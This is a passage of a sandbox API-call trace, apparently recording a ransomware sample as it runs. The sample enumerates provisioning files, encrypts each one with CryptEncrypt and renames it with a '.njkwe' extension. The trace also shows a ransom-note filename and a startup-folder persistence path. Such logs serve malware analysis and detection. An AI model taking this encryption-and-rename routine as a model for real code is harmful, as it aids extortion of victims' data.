(tunisia)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.085] GetTickCount () returned 0x1154d42 [0082.085] GetTickCount () returned 0x1154d42 [0082.085] GetTickCount () returned 0x1154d42 [0082.085] GetTickCount () returned 0x1154d42 [0082.085] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.085] GetProcessHeap () returned 0xbe0000 [0082.085] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.085] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0082.086] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.086] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0082.087] GetProcessHeap () returned 0xbe0000 [0082.087] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.087] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.087] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.087] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.087] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.087] CloseHandle (hObject=0x444) returned 1 [0082.087] GetProcessHeap () returned 0xbe0000 [0082.087] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.087] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\560__Connections_Cellular_Orange (Tunisia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0082.087] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\560__Connections_Cellular_Orange (Tunisia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\560__connections_cellular_orange (tunisia)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\560__Connections_Cellular_Orange (Tunisia)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\560__connections_cellular_orange (tunisia)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.088] GetProcessHeap () returned 0xbe0000 [0082.088] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.088] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9142a17a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9142a17a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9142a17a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="561__Connections_Cellular_Orange (Tunisia)_i2$(__MVID)@WAP.provxml", cAlternateFileName="561__C~1.PRO")) returned 1 [0082.088] lstrcmpiW (lpString1="561__Connections_Cellular_Orange (Tunisia)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.088] lstrcmpiW (lpString1="561__Connections_Cellular_Orange (Tunisia)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.088] lstrcmpiW (lpString1="561__Connections_Cellular_Orange (Tunisia)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.088] lstrcmpiW (lpString1="561__Connections_Cellular_Orange (Tunisia)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.088] lstrcmpiW (lpString1="561__Connections_Cellular_Orange (Tunisia)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.088] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\561__Connections_Cellular_Orange (Tunisia)_i2$(__MVID)@WAP.provxml") returned 160 [0082.088] StrStrIW (lpFirst="561__Connections_Cellular_Orange (Tunisia)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.088] lstrcmpW (lpString1="561__Connections_Cellular_Orange (Tunisia)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.088] lstrcmpW (lpString1="561__Connections_Cellular_Orange (Tunisia)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.088] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\561__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.088] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\561__Connections_Cellular_Orange (Tunisia)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\561__connections_cellular_orange (tunisia)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.089] GetTickCount () returned 0x1154d42 [0082.089] GetTickCount () returned 0x1154d42 [0082.089] GetTickCount () returned 0x1154d42 [0082.089] GetTickCount () returned 0x1154d42 [0082.089] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.089] GetProcessHeap () returned 0xbe0000 [0082.089] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.089] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0082.090] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd2e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.090] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d2, lpOverlapped=0x0) returned 1 [0082.091] GetProcessHeap () returned 0xbe0000 [0082.091] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.091] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.091] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.091] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.091] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.091] CloseHandle (hObject=0x444) returned 1 [0082.091] GetProcessHeap () returned 0xbe0000 [0082.091] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.091] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\561__Connections_Cellular_Orange (Tunisia)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0082.091] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\561__Connections_Cellular_Orange (Tunisia)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\561__connections_cellular_orange (tunisia)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\561__Connections_Cellular_Orange (Tunisia)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\561__connections_cellular_orange (tunisia)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.092] GetProcessHeap () returned 0xbe0000 [0082.092] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.092] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9142a17a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9142a17a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x914503e2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="562__Connections_Cellular_Orange (Tunisia)_i3$(__MVID)@WAP.provxml", cAlternateFileName="562__C~1.PRO")) returned 1 [0082.092] lstrcmpiW (lpString1="562__Connections_Cellular_Orange (Tunisia)_i3$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.092] lstrcmpiW (lpString1="562__Connections_Cellular_Orange (Tunisia)_i3$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.092] lstrcmpiW (lpString1="562__Connections_Cellular_Orange (Tunisia)_i3$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.092] lstrcmpiW (lpString1="562__Connections_Cellular_Orange (Tunisia)_i3$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.092] lstrcmpiW (lpString1="562__Connections_Cellular_Orange (Tunisia)_i3$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.092] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\562__Connections_Cellular_Orange (Tunisia)_i3$(__MVID)@WAP.provxml") returned 160 [0082.092] StrStrIW (lpFirst="562__Connections_Cellular_Orange (Tunisia)_i3$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.092] lstrcmpW (lpString1="562__Connections_Cellular_Orange (Tunisia)_i3$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.093] lstrcmpW (lpString1="562__Connections_Cellular_Orange (Tunisia)_i3$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.093] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\562__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.093] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\562__Connections_Cellular_Orange (Tunisia)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\562__connections_cellular_orange (tunisia)_i3$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.093] GetTickCount () returned 0x1154d42 [0082.093] GetTickCount () returned 0x1154d42 [0082.093] GetTickCount () returned 0x1154d42 [0082.093] GetTickCount () returned 0x1154d42 [0082.093] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.093] GetProcessHeap () returned 0xbe0000 [0082.093] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.093] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0082.096] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.096] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d7, lpOverlapped=0x0) returned 1 [0082.096] GetProcessHeap () returned 0xbe0000 [0082.096] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.096] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.096] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.096] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.096] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.096] CloseHandle (hObject=0x444) returned 1 [0082.096] GetProcessHeap () returned 0xbe0000 [0082.096] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.096] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\562__Connections_Cellular_Orange (Tunisia)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0082.096] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\562__Connections_Cellular_Orange (Tunisia)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\562__connections_cellular_orange (tunisia)_i3$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\562__Connections_Cellular_Orange (Tunisia)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\562__connections_cellular_orange (tunisia)_i3$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.097] GetProcessHeap () returned 0xbe0000 [0082.097] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.097] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x914503e2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x914503e2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x914503e2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="563__Connections_Cellular_Orange (Tunisia)_i4$(__MVID)@WAP.provxml", cAlternateFileName="563__C~1.PRO")) returned 1 [0082.097] lstrcmpiW (lpString1="563__Connections_Cellular_Orange (Tunisia)_i4$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.097] lstrcmpiW (lpString1="563__Connections_Cellular_Orange (Tunisia)_i4$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.097] lstrcmpiW (lpString1="563__Connections_Cellular_Orange (Tunisia)_i4$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.097] lstrcmpiW (lpString1="563__Connections_Cellular_Orange (Tunisia)_i4$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.097] lstrcmpiW (lpString1="563__Connections_Cellular_Orange (Tunisia)_i4$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.097] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\563__Connections_Cellular_Orange (Tunisia)_i4$(__MVID)@WAP.provxml") returned 160 [0082.097] StrStrIW (lpFirst="563__Connections_Cellular_Orange (Tunisia)_i4$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0082.097] lstrcmpW (lpString1="563__Connections_Cellular_Orange (Tunisia)_i4$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.097] lstrcmpW (lpString1="563__Connections_Cellular_Orange (Tunisia)_i4$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0082.097] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\563__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0082.097] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\563__Connections_Cellular_Orange (Tunisia)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\563__connections_cellular_orange (tunisia)_i4$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0082.098] GetTickCount () returned 0x1154d51 [0082.098] GetTickCount () returned 0x1154d51 [0082.098] GetTickCount () returned 0x1154d51 [0082.098] GetTickCount () returned 0x1154d51 [0082.098] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0082.098] GetProcessHeap () returned 0xbe0000 [0082.098] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0082.098] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0082.100] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.100] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0082.100] GetProcessHeap () returned 0xbe0000 [0082.100] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0082.100] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.100] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0082.100] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0082.100] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0082.100] CloseHandle (hObject=0x444) returned 1 [0082.101] GetProcessHeap () returned 0xbe0000 [0082.101] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0082.101] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\563__Connections_Cellular_Orange (Tunisia)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0082.101] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\563__Connections_Cellular_Orange (Tunisia)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\563__connections_cellular_orange (tunisia)_i4$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\563__Connections_Cellular_Orange (Tunisia)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\563__connections_cellular_orange (tunisia)_i4$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0082.101] GetProcessHeap () returned 0xbe0000 [0082.101] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0082.101] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x914503e2, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x914503e2, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x914503e2, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2db, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="564__Connections_Cellular_Orange (Tunisia)_i5$(__MVID)@WAP.provxml", cAlternateFileName="564__C~1.PRO")) returned 1 [0082.101] lstrcmpiW (lpString1="564__Connections_Cellular_Orange (Tunisia)_i5$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0082.101] lstrcmpiW (lpString1="564__Connections_Cellular_Orange (Tunisia)_i5$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0082.101] lstrcmpiW (lpString1="564__Connections_Cellular_Orange (Tunisia)_i5$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0082.101] lstrcmpiW (lpString1="564__Connections_Cellular_Orange (Tunisia)_i5$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0082.102] lstrcmpiW (lpString1="564__Connections_Cellular_Orange (Tunisia)_i5$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0082.102] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\564__Connections_Cellular_Orange (Tunisia)_i5$(__MVID)@WAP.provxml") returned 160 [0082.102] StrStrIW 